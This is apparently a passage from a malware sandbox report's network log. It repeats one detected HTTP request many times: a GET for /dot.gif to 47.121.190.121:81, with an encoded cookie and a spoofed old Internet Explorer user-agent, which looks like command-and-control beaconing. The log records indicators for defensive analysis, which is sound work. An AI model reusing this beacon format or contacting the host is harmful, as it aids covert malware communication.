Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
